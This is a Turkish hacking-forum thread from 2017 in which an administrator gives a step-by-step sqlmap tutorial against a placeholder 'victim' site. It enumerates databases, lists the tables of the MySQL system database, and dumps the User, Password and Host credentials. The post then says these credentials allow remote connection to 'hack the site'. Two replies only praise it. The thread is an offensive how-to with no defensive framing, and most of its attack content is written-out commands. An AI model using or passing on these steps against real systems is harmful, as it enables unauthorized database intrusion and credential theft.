Sqlmap ile mysql database hack

'Hack Dökümanları' forumunda Sagittarius tarafından 2 Aralık 2017 tarihinde açılan konu

  1. Sagittarius

    Sagittarius DAYI Site Yetkilisi Administrator

    Mesaj:
    279
    Beğeniler:
    651
    Cinsiyet:
    Erkek
    Şehir:
    Hollanda
    Sqlmap dizinine gelin ve sırasıyla gösterdiğim komutları uygulayın;

    sqlmap.py -u "http://www.hedefsite.com/vuln.php?id=5" --threads=10 --random-agent --dbs

    [​IMG]

    Komutumuzu vererek sitemizin veritabanı bilgilerini öğreneceğiz. Bize burda lazım olacak olan mysql veritabanıdır.
    Hemen mysql veritabanındaki tabloları çekiyoruz;

    sqlmap.py -u "http://www.hedefsite.com/vuln.php?id=5" --threads=10 --random-agent -D mysql --tables


    ve ardından User tablomuzdaki kolonları çekiyoruz;



    sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user --columns


    Kolonlar geldikten sonra bize gerekli olanları yani User, Password ve Host kolonlarındaki bilgileri çekiyoruz.

    sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user -C User,Password,Host --dump

    ve bilgiler elimizde, bu bilgiler ile linux da remote mysql bağlantısı yaparak siteyi hackleyebilirsiniz.
     
    SoulFly bunu beğendi.
  2. SoulFly

    SoulFly Kayıtlı Üye

    Mesaj:
    12
    Beğeniler:
    9
    Eline sağlık dayı :)
     
  3. Luntox

    Luntox Emir Veren | Emir Alan ? Onursal Ünvan

    Mesaj:
    562
    Beğeniler:
    480
    Şehir:
    MEXICO LOS CABOS
    Sağlam konu
     
Yükleniyor...

Bu Sayfayı Paylaş